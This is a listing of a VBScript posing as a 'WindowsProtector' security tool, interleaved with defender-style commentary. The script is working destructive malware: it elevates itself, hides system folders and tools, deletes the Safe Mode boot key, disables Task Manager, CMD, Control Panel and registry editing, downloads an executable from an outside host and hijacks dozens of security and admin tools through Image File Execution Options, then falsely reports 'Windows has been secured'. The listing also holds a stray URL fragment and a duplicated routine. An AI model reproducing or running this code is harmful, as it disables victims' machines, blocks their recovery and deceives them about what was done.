Joker0day

WindowsProtector rem

Dec 20th, 2017
Batch 10.24 KB | None | 0 0
  1. Rem WindowsProtector
  2.  
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  ' Entry point. When the /elevated named argument is absent, the script relaunches
  ' itself through ShellExecute with the "runas" verb (an elevation request that goes
  ' through UAC) and the original instance quits.
  ' Defender note: wscript.exe starting a second wscript.exe with "/elevated" on its
  ' command line is a process-creation pattern worth alerting on.
  9. If WScript.Arguments.Named.Exists("elevated") = False Then
  10.   CreateObject("Shell.Application").ShellExecute "wscript.exe", """" & WScript.ScriptFullName & """ /elevated", "", "runas", 1
  11.   WScript.Quit
  12. End If
  ' Expanded %UserProfile% path; read later when a text file is written to the Desktop.
  13. User = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%UserProfile%")
  14. dim Reg, fso, Eater
  ' Reg is the WScript.Shell object that the registry-writing routines below use.
  15. Set Reg = CreateObject("WScript.Shell")
  16. Set fso = CreateObject("Scripting.FileSystemObject")
  ' File object for this script itself; not referenced again in this listing.
  17. Set Eater = fso.GetFile(Wscript.ScriptFullName)
  ' Routines are invoked in the order listed here.
  ' NOTE(review): no Sub named HideFiles is visible in this listing.
  18. SlapClap
  19. HideFiles
  20. BolbisName
  21. Write2
  22. RunBat
  23. Holder
  24. BolbiMessage
  25. Write1
  26. CounterRemoval
  27. Success
  28.  
  ' Creates the folder C:\Users\Public\ghostroot, which the other routines in this
  ' listing use as the location for the dropped batch file, .msc file and downloaded
  ' executable.
  ' Defender note: the folder path is a host indicator to hunt for; a world-writable
  ' location under C:\Users\Public is a common staging choice.
  29. Sub SlapClap
  30. Dim oFSO
  31. Set oFSO = CreateObject("Scripting.FileSystemObject")
  32. oFSO.CreateFolder("C:\Users\Public\ghostroot")
  33. End Sub
  34.  
  ' Sets the Hidden attribute (bit value 2) on the Windows and System32 folders, on
  ' several built-in administration tools, and on the ghostroot staging folder.
  ' Defender note: the Hidden attribute on these system paths is an easily checked
  ' tamper indicator; clearing the attribute reverses this routine's effect.
  35. Sub HideBolbi
  36. Set fso = CreateObject("Scripting.FileSystemObject")
  ' Targets: two system folders, five tool paths, and the staging folder.
  37. Set Invisible1 = fso.getFolder("C:\Windows\")
  38. Set Invisible2 = fso.getFolder("C:\Windows\System32")
  39. Set Invisible3 = fso.getFile("C:\Windows\regedit.exe")
  40. Set Invisible4 = fso.getFile("C:\Windows\system32\regedit32.exe")
  41. Set Invisible5 = fso.getFile("C:\Windows\system32\cmd.exe")
  42. Set Invisible6 = fso.getFile("C:\Windows\system32\taskmgr.exe")
  43. Set Invisible7 = fso.getFile("C:\Windows\system32\gpedit.msc")
  44. Set Invisible8 = fso.getFolder("C:\Users\Public\ghostroot")
  ' OR-ing with 2 adds the Hidden flag while keeping the existing attribute bits.
  45. Invisible1.Attributes = Invisible1.Attributes or 2 ' 2 = hidden
  46. Invisible2.Attributes = Invisible2.Attributes or 2 ' 2 = hidden
  47. Invisible3.Attributes = Invisible3.Attributes or 2 ' 2 = hidden
  48. Invisible4.Attributes = Invisible4.Attributes or 2 ' 2 = hidden
  49. Invisible5.Attributes = Invisible5.Attributes or 2 ' 2 = hidden
  50. Invisible6.Attributes = Invisible6.Attributes or 2 ' 2 = hidden
  51. Invisible7.Attributes = Invisible7.Attributes or 2 ' 2 = hidden
  52. Invisible8.Attributes = Invisible8.Attributes or 2 ' 2 = hidden
  53. End Sub
  54.  
  ' Attempts three registry writes of the string "Bolbi": one to the active computer
  ' name value under HKLM, two to values named s1159 and s2359 under HKCU Control
  ' Panel paths (under Control Panel\International those names are the AM/PM
  ' designator strings).
  ' On Error Resume Next means a failed write is silently skipped, so the absence of
  ' one of these values does not show that the script did not run.
  55. Sub BolbisName
  56. On Error Resume Next
  57. reg.regwrite "HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName","Bolbi", "REG_SZ"
  58. reg.regwrite "HKCU\Control Panel\Interational\s1159","Bolbi", "REG_SZ"
  59. reg.regwrite "HKCU\Control Panel\International\s2359","Bolbi", "REG_SZ"
  60. End Sub
  61.  
  ' Shows a message box with the text "Windows has been secured". It is the last
  ' routine in the top-level call sequence, and the wording misrepresents what the
  ' preceding routines do (they disable tools and policies rather than secure
  ' anything).
  62. Sub Success
  63. MsgBox("Windows has been secured")
  64. End Sub
  65.  
  ' Creates C:\Users\Public\Ghostroot\Nope666666.msc, marks it Hidden, and writes a
  ' short text string into it. The same path is later registered as the Debugger
  ' value for gpedit.msc in CounterRemoval.
  ' NOTE(review): a second Sub with the name Write1 appears further down this listing.
  66. Sub Write1
  67. Set fso = CreateObject("Scripting.FileSystemObject")
  ' shell is created here but not used in this routine.
  68. set shell=CreateObject("Wscript.Shell")
  69. Set file = fso.CreateTextFile("C:\Users\Public\Ghostroot\Nope666666.msc")
  70. Set HideThis = fso.getFile("C:\Users\Public\Ghostroot\Nope666666.msc")
  71. HideThis.Attributes = HideThis.Attributes or 2 ' 2 = hidden
  ' The file is plain text despite the .msc extension; it is never explicitly closed.
  72. file.Write "Not happening dude "
  73. End Sub
  74.  
  ' Drops a hidden batch file, C:\Users\Public\Ghostroot\Nope.bat, containing three
  ' reg.exe commands. RunBat later executes this file.
  ' Defender note: a script host writing a .bat into a Public folder and a following
  ' reg.exe "delete ... SafeBoot" command line are both strong detection points.
  75. Sub Write2
  76. Set fso = CreateObject("Scripting.FileSystemObject")
  ' shell is created here but not used in this routine.
  77. set shell=CreateObject("Wscript.Shell")
  78. Set file = fso.CreateTextFile("C:\Users\Public\Ghostroot\Nope.bat")
  79. Set HideThis = fso.getFile("C:\Users\Public\Ghostroot\Nope.bat")
  80. HideThis.Attributes = HideThis.Attributes or 2 ' 2 = hidden
  81. file.Write "@echo off "
  82. file.WriteBlankLines(1)
  ' Deletes the SafeBoot key, which holds the Safe Mode boot configuration; recovery
  ' means restoring that key from a backup or a known-good system.
  83. file.Write "REG delete HKLM\System\CurrentControlSet\Control\SafeBoot /f"
  84. file.WriteBlankLines(1)
  ' The two REG ADD lines target the per-user policy paths that hide Control Panel
  ' and disable workstation locking.
  85. file.Write "REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel /f"
  86. file.WriteBlankLines(1)
  87. file.Write "REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation /f"
  88. file.WriteBlankLines(1)
  89. End Sub
  90.  
  ' Executes the batch file dropped by Write2 through WScript.Shell.Run.
  ' Defender note: wscript.exe launching a .bat from C:\Users\Public\Ghostroot shows
  ' up as a script-host-to-command-interpreter process chain in process-creation logs.
  91. Sub RunBat
  92. Dim Shell
  93. Set Shell = CreateObject("Wscript.Shell")
  94. Shell.run "C:\Users\Public\Ghostroot\Nope.Bat"
  95. End Sub
  96.  
  ' Waits 10 seconds, then writes five REG_DWORD values of 1 through the global Reg
  ' (WScript.Shell) object: two Explorer display settings (Hidden, HideFileExt) and
  ' three policy values (DisableTaskMgr, NoControlPanel, DisableLockWorkstation).
  ' Defender note: these policy values are well-known tamper indicators; registry
  ' auditing on the Policies\System and Policies\Explorer keys will record the writes,
  ' and remediation is to delete or reset the values.
  97. Sub Holder
  98. WScript.Sleep 10000
  99. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
  100. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
  ' The only HKLM write in this routine; the rest are per-user.
  101. Reg.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
  102. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
  103. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation", "1", "REG_DWORD"
  104. End Sub
  105.  
  ' Downloads an executable over plain HTTP with Microsoft.XMLHTTP and saves the
  ' response body to C:\Users\Public\ghostroot\qljcsu.exe through an ADODB.Stream.
  ' This routine only writes the file; the saved path is what CounterRemoval later
  ' registers as a Debugger value for many program names.
  ' Defender note: a script host making an outbound HTTP request and then writing an
  ' .exe to a user-writable folder is a standard downloader pattern; the URL host and
  ' the saved file path are the network and host indicators from this routine.
  106. Sub BolbiMessage
  107. dim xHttp, bStrm
  108. Set xHttp = createobject("Microsoft.XMLHTTP")
  109. Set bStrm = createobject("Adodb.Stream")
  ' Third argument False makes the request synchronous.
  110.  xHttp.Open "GET", "http://i.pomf.pl/qljcsu.exe", False
  111.  xHttp.Send
  112.  
  113.  with bStrm
  ' type = 1 selects binary mode; the response is written without any validation.
  114.  .type = 1
  115.  .open
  116. .write xHttp.responseBody
  ' Save option 2 overwrites an existing file at that path.
  117.  .savetofile "C:\Users\Public\ghostroot\qljcsu.exe", 2
  118. End With
  119. End Sub
  120.  
  ' Writes a taunt text file named Opps.txt to the current user's Desktop, using the
  ' User path resolved at the top of the script.
  ' NOTE(review): this is the second Sub named Write1 in this listing; the earlier one
  ' writes Nope666666.msc into the ghostroot folder.
  121. Sub Write1
  122. Set fso = CreateObject("Scripting.FileSystemObject")
  123. Set file = fso.CreateTextFile(User & "\Desktop\Opps.txt")
  124. file.Write "HA HA HA HA HA"
  125. End Sub
  126.  
  ' Anti-remediation routine. After a 5-second wait it attempts, with errors
  ' suppressed, a long series of registry changes aimed at blocking inspection and
  ' cleanup: file-handler command keys, Explorer policy values, Image File Execution
  ' Options (IFEO) Debugger values, and the DisableCMD / DisableRegistryTools policies.
  ' Defender note: IFEO Debugger redirection is catalogued as MITRE ATT&CK T1546.012.
  ' Auditing value-set events under "Image File Execution Options" (for example Sysmon
  ' registry value-set events) detects it. Because regedit.exe, cmd.exe and
  ' TaskMgr.exe are among the redirected names, cleanup may have to be done from a
  ' recovery environment or by editing the registry hive offline.
  127. Sub CounterRemoval
  128. WScript.Sleep 5000
  ' From here on, any statement that raises a runtime error is skipped silently.
  129. On Error Resume Next
  ' Paths under the .inf, .reg and .vbs file-type handlers, each ending in logoff.exe.
  130. Reg.Write "HKCR\inffile\shell\Install\command\logoff.exe "
  131. Reg.Write "HKCR\regfile\shell\open\command\ logoff.exe "
  132. Reg.Write "HKCR\VBSFile\Shell\Edit\Command\logoff.exe "
  ' Explorer settings and policies (HKCU and HKLM): hide file extensions, remove
  ' Folder Options, block file-association changes, remove Run and Search.
  133. Reg.Write "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
  134. Reg.Write "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
  135. Reg.Write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
  136. Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions" , "1", "REG_DWORD"
  137. Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
  138. Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
  139. Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
  140. Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
  141. Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
  142. Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
  ' NOTE(review): the next line is not a script statement; it looks like a pasted
  ' URL fragment left in the listing.
  143. Command%20Prompt%20Portable/CommandPromptPortable_2.4.paf.exe
  ' IFEO Debugger values: when a Debugger is registered for an image name, Windows
  ' starts the registered program in place of that image. The names below cover
  ' security and cleanup tools, built-in administration tools, script editors and
  ' generic installer names; all but gpedit.msc point at the downloaded qljcsu.exe.
  144. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msert.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  145. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskKiller.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  146. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  147. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  148. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  149. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  150. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  151. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  152. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  153. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htaedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  154. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  155. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  156. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  157. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  158. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  159. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  160. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  ' This entry alone points at the hidden text file Nope666666.msc instead of the .exe.
  161. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gpedit.msc\Debugger","C:\Users\Public\Ghostroot\Nope666666.msc"
  162. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  163. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  164. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  165. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  166. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  167. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  168. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  169. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  170. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  171. Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\installer.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
  ' Per-user policies that disable the command prompt and registry editing tools.
  172. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
  173. Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
  174. End Sub